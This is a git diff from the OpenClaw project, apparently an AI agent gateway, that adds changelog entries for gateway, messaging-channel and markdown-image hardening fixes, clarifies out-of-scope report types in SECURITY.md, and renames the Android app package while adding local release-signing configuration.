billed provider keys from active skills. (#36316) Thanks @taw0002 and @vincentkoc. - WhatsApp media upload caps: make outbound media sends and auto-replies honor `channels.whatsapp.mediaMaxMb` with per-account overrides so inbound and outbound limits use the same channel config. Thanks @vincentkoc. - Windows/Plugin install: when OpenClaw runs on Windows via Bun and `npm-cli.js` is not colocated with the runtime binary, fall back to `npm.cmd`/`npx.cmd` through the existing `cmd.exe` wrapper so `openclaw plugins install` no longer fails with `spawn EINVAL`. (#38056) Thanks @0xlin2023. - Telegram/send retry classification: retry grammY `Network request ... failed after N attempts` envelopes in send flows without reclassifying plain `Network request ... failed!` wrappers as transient, restoring the intended retry path while keeping broad send-context message matching tight. (#38056) Thanks @0xlin2023. -- Gateway/probe route precedence: keep `/health`, `/healthz`, `/ready`, and `/readyz` reachable when the Control UI is mounted at `/`, so root-mounted SPA fallbacks no longer swallow machine probe routes while plugin-owned routes on those paths still keep precedence. (#18446) Thanks @vibecodooor and @vincentkoc. +- Gateway/probes: keep `/health`, `/healthz`, `/ready`, and `/readyz` reachable when the Control UI is mounted at `/`, preserve plugin-owned route precedence on those paths, and make `/ready` and `/readyz` report channel-backed readiness with startup grace plus `503` on disconnected managed channels, while `/health` and `/healthz` stay shallow liveness probes. (#18446) Thanks @vibecodooor, @mahsumaktas, and @vincentkoc. +- Feishu/media downloads: drop invalid timeout fields from SDK method calls now that client-level `httpTimeoutMs` applies to requests. (#38267) Thanks @ant1eicher and @thewilloftheshadow. +- PI embedded runner/Feishu docs: propagate sender identity into embedded attempts so Feishu doc auto-grant restores requester access for embedded-runner executions. (#32915) thanks @cszhouwei. +- Agents/usage normalization: normalize missing or partial assistant usage snapshots before compaction accounting so `openclaw agent --json` no longer crashes when provider payloads omit `totalTokens` or related usage fields. (#34977) thanks @sp-hk2ldn. +- Venice/default model refresh: switch the built-in Venice default to `kimi-k2-5`, update onboarding aliasing, and refresh Venice provider docs/recommendations to match the current private and anonymized catalog. (from #12964) Fixes #20156. Thanks @sabrinaaquino and @vincentkoc. +- Agents/skill API write pacing: add a global prompt guardrail that treats skill-driven external API writes as rate-limited by default, so runners prefer batched writes, avoid tight request loops, and respect `429`/`Retry-After`. Thanks @vincentkoc. +- Google Chat/multi-account webhook auth fallback: when `channels.googlechat.accounts.default` carries shared webhook audience/path settings (for example after config normalization), inherit those defaults for named accounts while preserving top-level and per-account overrides, so inbound webhook verification no longer fails silently for named accounts missing duplicated audience fields. Fixes #38369. +- Models/tool probing: raise the tool-capability probe budget from 32 to 256 tokens so reasoning models that spend tokens on thinking before returning a required tool call are less likely to be misclassified as not supporting tools. (#7521) Thanks @jakobdylanc. +- Gateway/transient network classification: treat wrapped `...: fetch failed` transport messages as transient while avoiding broad matches like `Web fetch failed (404): ...`, preventing Discord reconnect wrappers from crashing the gateway without suppressing non-network tool failures. (#38530) Thanks @xinhuagu. +- ACP/console silent reply suppression: filter ACP `NO_REPLY` lead fragments and silent-only finals before `openclaw agent` logging/delivery so console-backed ACP sessions no longer leak `NO`/`NO_REPLY` placeholders. (#38436) Thanks @ql-wade. +- Feishu/reply delivery reliability: disable block streaming in Feishu reply options so plain-text auto-render replies are no longer silently dropped before final delivery. (#38258) Thanks @xinhuagu. +- Agents/reply MEDIA delivery: normalize local assistant `MEDIA:` paths before block/final delivery, keep media dedupe aligned with message-tool sends, and contain malformed media normalization failures so generated files send reliably instead of falling back to empty responses. (#38572) Thanks @obviyus. +- Sessions/bootstrap cache rollover invalidation: clear cached workspace bootstrap snapshots whenever an existing `sessionKey` rolls to a new `sessionId` across auto-reply, command, and isolated cron session resolvers, so `AGENTS.md`/`MEMORY.md`/`USER.md` updates are reloaded after daily, idle, or forced session resets instead of staying stale until gateway restart. (#38494) Thanks @LivingInDrm. +- Gateway/Telegram polling health monitor: skip stale-socket restarts for Telegram long-polling channels and thread channel identity through shared health evaluation so polling connections are not restarted on the WebSocket stale-socket heuristic. (#38395) Thanks @ql-wade and @Takhoffman. +- Daemon/systemd fresh-install probe: check for OpenClaw's managed user unit before running `systemctl --user is-enabled`, so first-time Linux installs no longer fail on generic missing-unit probe errors. (#38819) Thanks @adaHubble. +- Gateway/Windows restart supervision: relaunch task-managed gateways through Scheduled Task with quoted helper-script command paths, distinguish restart-capable supervisors per platform, and stop orphaned Windows gateway children during self-restart. (#38825) Thanks @obviyus. +- Telegram/native topic command routing: resolve forum-topic native commands through the same conversation route as inbound messages so topic `agentId` overrides and bound topic sessions target the active session instead of the default topic-parent session. (#38871) Thanks @obviyus. +- Markdown/assistant image hardening: flatten remote markdown images to plain text across the Control UI, exported HTML, and shared Swift chat while keeping inline `data:image/...` markdown renderable, so model output no longer triggers automatic remote image fetches. (#38895) Thanks @obviyus. ## 2026.3.2 @@ -234,6 +258,7 @@ Docs: https://docs.openclaw.ai - Plugin runtime/events: expose `runtime.events.onAgentEvent` and `runtime.events.onSessionTranscriptUpdate` for extension-side subscriptions, and isolate transcript-listener failures so one faulty listener cannot break the entire update fanout. (#16044) Thanks @scifantastic. - CLI/Banner taglines: add `cli.banner.taglineMode` (`random` | `default` | `off`) to control funny tagline behavior in startup output, with docs + FAQ guidance and regression tests for config override behavior. - Agents/compaction safeguard quality-audit rollout: keep summary quality audits disabled by default unless `agents.defaults.compaction.qualityGuard` is explicitly enabled, and add config plumbing for bounded retry control. (#25556) thanks @rodrigouroz. +- Gateway/input_image MIME validation: sniff uploaded image bytes before MIME allowlist enforcement again so declared image types cannot mask concrete non-image payloads, while keeping HEIC/HEIF normalization behavior scoped to actual HEIC inputs. Thanks @vincentkoc. ### Breaking @@ -560,6 +585,7 @@ Docs: https://docs.openclaw.ai - Docs/Contributing: require before/after screenshots for UI or visual PRs in the pre-PR checklist. (#32206) Thanks @hydro13. - Models/OpenAI forward compat: add support for `openai/gpt-5.4`, `openai/gpt-5.4-pro`, and `openai-codex/gpt-5.4`, including direct OpenAI Responses `serviceTier` passthrough safeguards for valid values. (#36590) Thanks @dorukardahan. +- Android/Play package ID: rename the Android app package to `ai.openclaw.app`, including matching benchmark and Android tooling references for Play publishing. (#38712) Thanks @obviyus. ### Fixes @@ -708,6 +734,7 @@ Docs: https://docs.openclaw.ai - Slack/Disabled channel startup: skip Slack monitor socket startup entirely when `channels.slack.enabled=false` (including configs that still contain valid tokens), preventing disabled accounts from opening websocket connections. (#30586) Thanks @liuxiaopai-ai. - Onboarding/Custom providers: use Azure OpenAI-specific verification auth/payload shape (`api-key`, deployment-path chat completions payload) when probing Azure endpoints so valid Azure custom-provider setup no longer fails preflight. (#29421) Thanks @kunalk16. - Feishu/Docx editing tools: add `feishu_doc` positional insert, table row/column operations, table-cell merge, and color-text updates; switch markdown write/append/insert to Descendant API insertion with large-document batching; and harden image uploads for data URI/base64/local-path inputs with strict validation and routing-safe upload metadata. (#29411) Thanks @Elarwei001. +- Commands/Owner-only tools: treat identified direct-chat senders as owners when no owner allowlist is configured, while preserving internal `operator.admin` owner sessions. (#26331) thanks @widingmarcus-cyber ## 2026.2.26 @@ -2878,6 +2905,7 @@ Docs: https://docs.openclaw.ai - BlueBubbles: resolve short message IDs safely and expose full IDs in templates. (#1387) Thanks @tyler6204. - Infra: preserve fetch helper methods when wrapping abort signals. (#1387) - macOS: default distribution packaging to universal binaries. (#1396) Thanks @JustYannicc. +- Embedded runner: forward sender identity into attempt execution so Feishu doc auto-grant receives requester context again. (#32915) Thanks @cszhouwei. ## 2026.1.20 diff --git a/SECURITY.md b/SECURITY.md index 78a18b606db..5f1e8f0cb9e 100644 --- a/SECURITY.md +++ b/SECURITY.md @@ -51,6 +51,7 @@ These are frequently reported but are typically closed with no code change: - Prompt-injection-only chains without a boundary bypass (prompt injection is out of scope). - Operator-intended local features (for example TUI local `!` shell) presented as remote injection. +- Reports that treat explicit operator-control surfaces (for example `canvas.eval`, browser evaluate/script execution, or direct `node.invoke` execution primitives) as vulnerabilities without demonstrating an auth/policy/sandbox boundary bypass. These capabilities are intentional when enabled and are trusted-operator features, not standalone security bugs. - Authorized user-triggered local actions presented as privilege escalation. Example: an allowlisted/owner sender running `/export-session /absolute/path.html` to write on the host. In this trust model, authorized user actions are trusted host actions unless you demonstrate an auth/sandbox/boundary bypass. - Reports that only show a malicious plugin executing privileged actions after a trusted operator installs/enables it. - Reports that assume per-user multi-tenant authorization on a shared gateway host/config. @@ -119,6 +120,7 @@ Plugins/extensions are part of OpenClaw's trusted computing base for a gateway. - Reports whose only claim is sandbox/workspace read expansion through trusted local skill/workspace symlink state (for example `skills/*/SKILL.md` symlink chains) unless a separate untrusted boundary bypass is shown that creates/controls that state. - Reports whose only claim is post-approval executable identity drift on a trusted host via same-path file replacement/rewrite unless a separate untrusted boundary bypass is shown for that host write primitive. - Reports where the only demonstrated impact is an already-authorized sender intentionally invoking a local-action command (for example `/export-session` writing to an absolute host path) without bypassing auth, sandbox, or another documented boundary +- Reports whose only claim is use of an explicit trusted-operator control surface (for example `canvas.eval`, browser evaluate/script execution, or direct `node.invoke` execution) without demonstrating an auth, policy, allowlist, approval, or sandbox bypass. - Reports where the only claim is that a trusted-installed/enabled plugin can execute with gateway/host privileges (documented trust model behavior). - Any report whose only claim is that an operator-enabled `dangerous*`/`dangerously*` config option weakens defaults (these are explicit break-glass tradeoffs by design) - Reports that depend on trusted operator-supplied configuration values to trigger availability impact (for example custom regex patterns). These may still be fixed as defense-in-depth hardening, but are not security-boundary bypasses. diff --git a/appcast.xml b/appcast.xml index 22e4df0b698..f1e626843dc 100644 --- a/appcast.xml +++ b/appcast.xml @@ -219,7 +219,7 @@

View full changelog

]]> - + 2026.3.1 @@ -357,7 +357,7 @@

View full changelog

]]> - + - \ No newline at end of file + diff --git a/apps/android/app/build.gradle.kts b/apps/android/app/build.gradle.kts index 9f714a64304..d570a8cd9a3 100644 --- a/apps/android/app/build.gradle.kts +++ b/apps/android/app/build.gradle.kts @@ -1,5 +1,35 @@ import com.android.build.api.variant.impl.VariantOutputImpl +val androidStoreFile = providers.gradleProperty("OPENCLAW_ANDROID_STORE_FILE").orNull?.takeIf { it.isNotBlank() } +val androidStorePassword = providers.gradleProperty("OPENCLAW_ANDROID_STORE_PASSWORD").orNull?.takeIf { it.isNotBlank() } +val androidKeyAlias = providers.gradleProperty("OPENCLAW_ANDROID_KEY_ALIAS").orNull?.takeIf { it.isNotBlank() } +val androidKeyPassword = providers.gradleProperty("OPENCLAW_ANDROID_KEY_PASSWORD").orNull?.takeIf { it.isNotBlank() } +val resolvedAndroidStoreFile = + androidStoreFile?.let { storeFilePath -> + if (storeFilePath.startsWith("~/")) { + "${System.getProperty("user.home")}/${storeFilePath.removePrefix("~/")}" + } else { + storeFilePath + } + } + +val hasAndroidReleaseSigning = + listOf(resolvedAndroidStoreFile, androidStorePassword, androidKeyAlias, androidKeyPassword).all { it != null } + +val wantsAndroidReleaseBuild = + gradle.startParameter.taskNames.any { taskName -> + taskName.contains("Release", ignoreCase = true) || + Regex("""(^|:)(bundle|assemble)$""").containsMatchIn(taskName) + } + +if (wantsAndroidReleaseBuild && !hasAndroidReleaseSigning) { + error( + "Missing Android release signing properties. Set OPENCLAW_ANDROID_STORE_FILE, " + + "OPENCLAW_ANDROID_STORE_PASSWORD, OPENCLAW_ANDROID_KEY_ALIAS, and " + + "OPENCLAW_ANDROID_KEY_PASSWORD in ~/.gradle/gradle.properties.", + ) +} + plugins { id("com.android.application") id("org.jlleitschuh.gradle.ktlint") @@ -8,9 +38,21 @@ plugins { } android { - namespace = "ai.openclaw.android" + namespace = "ai.openclaw.app" compileSdk = 36 + // Release signing is local-only; keep the keystore path and passwords out of the repo. + signingConfigs { + if (hasAndroidReleaseSigning) { + create("release") { + storeFile = project.file(checkNotNull(resolvedAndroidStoreFile)) + storePassword = checkNotNull(androidStorePassword) + keyAlias = checkNotNull(androidKeyAlias) + keyPassword = checkNotNull(androidKeyPassword) + } + } + } + sourceSets { getByName("main") { assets.directories.add("../../shared/OpenClawKit/Sources/OpenClawKit/Resources") @@ -18,11 +60,11 @@ android { } defaultConfig { - applicationId = "ai.openclaw.android" + applicationId = "ai.openclaw.app" minSdk = 31 targetSdk = 36 - versionCode = 202603010 - versionName = "2026.3.2" + versionCode = 202603070 + versionName = "2026.3.7" ndk { // Support all major ABIs — native libs are tiny (~47 KB per ABI) abiFilters += listOf("armeabi-v7a", "arm64-v8a", "x86", "x86_64") @@ -31,6 +73,9 @@ android { buildTypes { release { + if (hasAndroidReleaseSigning) { + signingConfig = signingConfigs.getByName("release") + } isMinifyEnabled = true isShrinkResources = true proguardFiles(getDefaultProguardFile("proguard-android-optimize.txt"), "proguard-rules.pro") diff --git a/apps/android/app/proguard-rules.pro b/apps/android/app/proguard-rules.pro index d73c79711d6..78e4a363919 100644 --- a/apps/android/app/proguard-rules.pro +++ b/apps/android/app/proguard-rules.pro @@ -1,5 +1,5 @@ # ── App classes ─────────────────────────────────────────────────── --keep class ai.openclaw.android.** { *; } +-keep class ai.openclaw.app.** { *; } # ── Bouncy Castle ───────────────────────────────────────────────── -keep class org.bouncycastle.** { *; } diff --git a/apps/android/app/src/main/java/ai/openclaw/android/CameraHudState.kt b/apps/android/app/src/main/java/ai/openclaw/app/CameraHudState.kt similarity index 85% rename from apps/android/app/src/main/java/ai/openclaw/android/CameraHudState.kt rename to apps/android/app/src/main/java/ai/openclaw/app/CameraHudState.kt index 636c31bdd3c..cd0ace8b76d 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/CameraHudState.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/CameraHudState.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android +package ai.openclaw.app enum class CameraHudKind { Photo, diff --git a/apps/android/app/src/main/java/ai/openclaw/android/DeviceNames.kt b/apps/android/app/src/main/java/ai/openclaw/app/DeviceNames.kt similarity index 95% rename from apps/android/app/src/main/java/ai/openclaw/android/DeviceNames.kt rename to apps/android/app/src/main/java/ai/openclaw/app/DeviceNames.kt index 3c44a3bb4f7..7416ca9ed81 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/DeviceNames.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/DeviceNames.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android +package ai.openclaw.app import android.content.Context import android.os.Build diff --git a/apps/android/app/src/main/java/ai/openclaw/android/InstallResultReceiver.kt b/apps/android/app/src/main/java/ai/openclaw/app/InstallResultReceiver.kt similarity index 97% rename from apps/android/app/src/main/java/ai/openclaw/android/InstallResultReceiver.kt rename to apps/android/app/src/main/java/ai/openclaw/app/InstallResultReceiver.kt index ffb21258c1c..745ea11f96e 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/InstallResultReceiver.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/InstallResultReceiver.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android +package ai.openclaw.app import android.content.BroadcastReceiver import android.content.Context diff --git a/apps/android/app/src/main/java/ai/openclaw/android/LocationMode.kt b/apps/android/app/src/main/java/ai/openclaw/app/LocationMode.kt similarity index 92% rename from apps/android/app/src/main/java/ai/openclaw/android/LocationMode.kt rename to apps/android/app/src/main/java/ai/openclaw/app/LocationMode.kt index eb9c84428e0..b673ff27056 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/LocationMode.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/LocationMode.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android +package ai.openclaw.app enum class LocationMode(val rawValue: String) { Off("off"), diff --git a/apps/android/app/src/main/java/ai/openclaw/android/MainActivity.kt b/apps/android/app/src/main/java/ai/openclaw/app/MainActivity.kt similarity index 94% rename from apps/android/app/src/main/java/ai/openclaw/android/MainActivity.kt rename to apps/android/app/src/main/java/ai/openclaw/app/MainActivity.kt index b90427672c6..08cca4e4fcd 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/MainActivity.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/MainActivity.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android +package ai.openclaw.app import android.os.Bundle import android.view.WindowManager @@ -11,8 +11,8 @@ import androidx.compose.ui.Modifier import androidx.lifecycle.Lifecycle import androidx.lifecycle.lifecycleScope import androidx.lifecycle.repeatOnLifecycle -import ai.openclaw.android.ui.RootScreen -import ai.openclaw.android.ui.OpenClawTheme +import ai.openclaw.app.ui.RootScreen +import ai.openclaw.app.ui.OpenClawTheme import kotlinx.coroutines.launch class MainActivity : ComponentActivity() { diff --git a/apps/android/app/src/main/java/ai/openclaw/android/MainViewModel.kt b/apps/android/app/src/main/java/ai/openclaw/app/MainViewModel.kt similarity index 94% rename from apps/android/app/src/main/java/ai/openclaw/android/MainViewModel.kt rename to apps/android/app/src/main/java/ai/openclaw/app/MainViewModel.kt index 6d10da0f5fe..db79df9c17a 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/MainViewModel.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/MainViewModel.kt @@ -1,14 +1,14 @@ -package ai.openclaw.android +package ai.openclaw.app import android.app.Application import androidx.lifecycle.AndroidViewModel -import ai.openclaw.android.gateway.GatewayEndpoint -import ai.openclaw.android.chat.OutgoingAttachment -import ai.openclaw.android.node.CameraCaptureManager -import ai.openclaw.android.node.CanvasController -import ai.openclaw.android.node.ScreenRecordManager -import ai.openclaw.android.node.SmsManager -import ai.openclaw.android.voice.VoiceConversationEntry +import ai.openclaw.app.gateway.GatewayEndpoint +import ai.openclaw.app.chat.OutgoingAttachment +import ai.openclaw.app.node.CameraCaptureManager +import ai.openclaw.app.node.CanvasController +import ai.openclaw.app.node.ScreenRecordManager +import ai.openclaw.app.node.SmsManager +import ai.openclaw.app.voice.VoiceConversationEntry import kotlinx.coroutines.flow.StateFlow class MainViewModel(app: Application) : AndroidViewModel(app) { diff --git a/apps/android/app/src/main/java/ai/openclaw/android/NodeApp.kt b/apps/android/app/src/main/java/ai/openclaw/app/NodeApp.kt similarity index 95% rename from apps/android/app/src/main/java/ai/openclaw/android/NodeApp.kt rename to apps/android/app/src/main/java/ai/openclaw/app/NodeApp.kt index ab5e159cf47..0d172a8abe7 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/NodeApp.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/NodeApp.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android +package ai.openclaw.app import android.app.Application import android.os.StrictMode diff --git a/apps/android/app/src/main/java/ai/openclaw/android/NodeForegroundService.kt b/apps/android/app/src/main/java/ai/openclaw/app/NodeForegroundService.kt similarity index 98% rename from apps/android/app/src/main/java/ai/openclaw/android/NodeForegroundService.kt rename to apps/android/app/src/main/java/ai/openclaw/app/NodeForegroundService.kt index a6a79dc9c4a..684849b3e86 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/NodeForegroundService.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/NodeForegroundService.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android +package ai.openclaw.app import android.app.Notification import android.app.NotificationChannel @@ -163,7 +163,7 @@ class NodeForegroundService : Service() { private const val CHANNEL_ID = "connection" private const val NOTIFICATION_ID = 1 - private const val ACTION_STOP = "ai.openclaw.android.action.STOP" + private const val ACTION_STOP = "ai.openclaw.app.action.STOP" fun start(context: Context) { val intent = Intent(context, NodeForegroundService::class.java) diff --git a/apps/android/app/src/main/java/ai/openclaw/android/NodeRuntime.kt b/apps/android/app/src/main/java/ai/openclaw/app/NodeRuntime.kt similarity index 97% rename from apps/android/app/src/main/java/ai/openclaw/android/NodeRuntime.kt rename to apps/android/app/src/main/java/ai/openclaw/app/NodeRuntime.kt index bcd58a808b7..263a80fc076 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/NodeRuntime.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/NodeRuntime.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android +package ai.openclaw.app import android.Manifest import android.content.Context @@ -6,22 +6,22 @@ import android.content.pm.PackageManager import android.os.SystemClock import android.util.Log import androidx.core.content.ContextCompat -import ai.openclaw.android.chat.ChatController -import ai.openclaw.android.chat.ChatMessage -import ai.openclaw.android.chat.ChatPendingToolCall -import ai.openclaw.android.chat.ChatSessionEntry -import ai.openclaw.android.chat.OutgoingAttachment -import ai.openclaw.android.gateway.DeviceAuthStore -import ai.openclaw.android.gateway.DeviceIdentityStore -import ai.openclaw.android.gateway.GatewayDiscovery -import ai.openclaw.android.gateway.GatewayEndpoint -import ai.openclaw.android.gateway.GatewaySession -import ai.openclaw.android.gateway.probeGatewayTlsFingerprint -import ai.openclaw.android.node.* -import ai.openclaw.android.protocol.OpenClawCanvasA2UIAction -import ai.openclaw.android.voice.MicCaptureManager -import ai.openclaw.android.voice.TalkModeManager -import ai.openclaw.android.voice.VoiceConversationEntry +import ai.openclaw.app.chat.ChatController +import ai.openclaw.app.chat.ChatMessage +import ai.openclaw.app.chat.ChatPendingToolCall +import ai.openclaw.app.chat.ChatSessionEntry +import ai.openclaw.app.chat.OutgoingAttachment +import ai.openclaw.app.gateway.DeviceAuthStore +import ai.openclaw.app.gateway.DeviceIdentityStore +import ai.openclaw.app.gateway.GatewayDiscovery +import ai.openclaw.app.gateway.GatewayEndpoint +import ai.openclaw.app.gateway.GatewaySession +import ai.openclaw.app.gateway.probeGatewayTlsFingerprint +import ai.openclaw.app.node.* +import ai.openclaw.app.protocol.OpenClawCanvasA2UIAction +import ai.openclaw.app.voice.MicCaptureManager +import ai.openclaw.app.voice.TalkModeManager +import ai.openclaw.app.voice.VoiceConversationEntry import kotlinx.coroutines.CoroutineScope import kotlinx.coroutines.Dispatchers import kotlinx.coroutines.Job diff --git a/apps/android/app/src/main/java/ai/openclaw/android/PermissionRequester.kt b/apps/android/app/src/main/java/ai/openclaw/app/PermissionRequester.kt similarity index 99% rename from apps/android/app/src/main/java/ai/openclaw/android/PermissionRequester.kt rename to apps/android/app/src/main/java/ai/openclaw/app/PermissionRequester.kt index 0ee267b5588..3cc8919c52e 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/PermissionRequester.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/PermissionRequester.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android +package ai.openclaw.app import android.content.pm.PackageManager import android.content.Intent diff --git a/apps/android/app/src/main/java/ai/openclaw/android/ScreenCaptureRequester.kt b/apps/android/app/src/main/java/ai/openclaw/app/ScreenCaptureRequester.kt similarity index 98% rename from apps/android/app/src/main/java/ai/openclaw/android/ScreenCaptureRequester.kt rename to apps/android/app/src/main/java/ai/openclaw/app/ScreenCaptureRequester.kt index c215103b54d..77711f27ca7 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/ScreenCaptureRequester.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/ScreenCaptureRequester.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android +package ai.openclaw.app import android.app.Activity import android.content.Context diff --git a/apps/android/app/src/main/java/ai/openclaw/android/SecurePrefs.kt b/apps/android/app/src/main/java/ai/openclaw/app/SecurePrefs.kt similarity index 99% rename from apps/android/app/src/main/java/ai/openclaw/android/SecurePrefs.kt rename to apps/android/app/src/main/java/ai/openclaw/app/SecurePrefs.kt index a907fdf01d4..cc996cf65d8 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/SecurePrefs.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/SecurePrefs.kt @@ -1,6 +1,6 @@ @file:Suppress("DEPRECATION") -package ai.openclaw.android +package ai.openclaw.app import android.content.Context import android.content.SharedPreferences diff --git a/apps/android/app/src/main/java/ai/openclaw/android/SessionKey.kt b/apps/android/app/src/main/java/ai/openclaw/app/SessionKey.kt similarity index 92% rename from apps/android/app/src/main/java/ai/openclaw/android/SessionKey.kt rename to apps/android/app/src/main/java/ai/openclaw/app/SessionKey.kt index 8148a17029e..3719ec11bb9 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/SessionKey.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/SessionKey.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android +package ai.openclaw.app internal fun normalizeMainKey(raw: String?): String { val trimmed = raw?.trim() diff --git a/apps/android/app/src/main/java/ai/openclaw/android/VoiceWakeMode.kt b/apps/android/app/src/main/java/ai/openclaw/app/VoiceWakeMode.kt similarity index 91% rename from apps/android/app/src/main/java/ai/openclaw/android/VoiceWakeMode.kt rename to apps/android/app/src/main/java/ai/openclaw/app/VoiceWakeMode.kt index 75c2fe34468..ea236f3306c 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/VoiceWakeMode.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/VoiceWakeMode.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android +package ai.openclaw.app enum class VoiceWakeMode(val rawValue: String) { Off("off"), diff --git a/apps/android/app/src/main/java/ai/openclaw/android/WakeWords.kt b/apps/android/app/src/main/java/ai/openclaw/app/WakeWords.kt similarity index 95% rename from apps/android/app/src/main/java/ai/openclaw/android/WakeWords.kt rename to apps/android/app/src/main/java/ai/openclaw/app/WakeWords.kt index b64cb1dd749..7bd3ca13cde 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/WakeWords.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/WakeWords.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android +package ai.openclaw.app object WakeWords { const val maxWords: Int = 32 diff --git a/apps/android/app/src/main/java/ai/openclaw/android/chat/ChatController.kt b/apps/android/app/src/main/java/ai/openclaw/app/chat/ChatController.kt similarity index 99% rename from apps/android/app/src/main/java/ai/openclaw/android/chat/ChatController.kt rename to apps/android/app/src/main/java/ai/openclaw/app/chat/ChatController.kt index a8009f80400..be430480fb0 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/chat/ChatController.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/chat/ChatController.kt @@ -1,6 +1,6 @@ -package ai.openclaw.android.chat +package ai.openclaw.app.chat -import ai.openclaw.android.gateway.GatewaySession +import ai.openclaw.app.gateway.GatewaySession import java.util.UUID import java.util.concurrent.ConcurrentHashMap import kotlinx.coroutines.CoroutineScope diff --git a/apps/android/app/src/main/java/ai/openclaw/android/chat/ChatModels.kt b/apps/android/app/src/main/java/ai/openclaw/app/chat/ChatModels.kt similarity index 96% rename from apps/android/app/src/main/java/ai/openclaw/android/chat/ChatModels.kt rename to apps/android/app/src/main/java/ai/openclaw/app/chat/ChatModels.kt index dd17a8c1ae5..f6d08c535c5 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/chat/ChatModels.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/chat/ChatModels.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.chat +package ai.openclaw.app.chat data class ChatMessage( val id: String, diff --git a/apps/android/app/src/main/java/ai/openclaw/android/gateway/BonjourEscapes.kt b/apps/android/app/src/main/java/ai/openclaw/app/gateway/BonjourEscapes.kt similarity index 96% rename from apps/android/app/src/main/java/ai/openclaw/android/gateway/BonjourEscapes.kt rename to apps/android/app/src/main/java/ai/openclaw/app/gateway/BonjourEscapes.kt index 1606df79ec6..2fa0befbb5c 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/gateway/BonjourEscapes.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/gateway/BonjourEscapes.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.gateway +package ai.openclaw.app.gateway object BonjourEscapes { fun decode(input: String): String { diff --git a/apps/android/app/src/main/java/ai/openclaw/android/gateway/DeviceAuthPayload.kt b/apps/android/app/src/main/java/ai/openclaw/app/gateway/DeviceAuthPayload.kt similarity index 97% rename from apps/android/app/src/main/java/ai/openclaw/android/gateway/DeviceAuthPayload.kt rename to apps/android/app/src/main/java/ai/openclaw/app/gateway/DeviceAuthPayload.kt index 9fecaa03b55..f556341e10a 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/gateway/DeviceAuthPayload.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/gateway/DeviceAuthPayload.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.gateway +package ai.openclaw.app.gateway internal object DeviceAuthPayload { fun buildV3( diff --git a/apps/android/app/src/main/java/ai/openclaw/android/gateway/DeviceAuthStore.kt b/apps/android/app/src/main/java/ai/openclaw/app/gateway/DeviceAuthStore.kt similarity index 92% rename from apps/android/app/src/main/java/ai/openclaw/android/gateway/DeviceAuthStore.kt rename to apps/android/app/src/main/java/ai/openclaw/app/gateway/DeviceAuthStore.kt index 8ace62e087c..d1ac63a90ff 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/gateway/DeviceAuthStore.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/gateway/DeviceAuthStore.kt @@ -1,6 +1,6 @@ -package ai.openclaw.android.gateway +package ai.openclaw.app.gateway -import ai.openclaw.android.SecurePrefs +import ai.openclaw.app.SecurePrefs interface DeviceAuthTokenStore { fun loadToken(deviceId: String, role: String): String? diff --git a/apps/android/app/src/main/java/ai/openclaw/android/gateway/DeviceIdentityStore.kt b/apps/android/app/src/main/java/ai/openclaw/app/gateway/DeviceIdentityStore.kt similarity index 99% rename from apps/android/app/src/main/java/ai/openclaw/android/gateway/DeviceIdentityStore.kt rename to apps/android/app/src/main/java/ai/openclaw/app/gateway/DeviceIdentityStore.kt index 68830772f9a..1e226382031 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/gateway/DeviceIdentityStore.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/gateway/DeviceIdentityStore.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.gateway +package ai.openclaw.app.gateway import android.content.Context import android.util.Base64 diff --git a/apps/android/app/src/main/java/ai/openclaw/android/gateway/GatewayDiscovery.kt 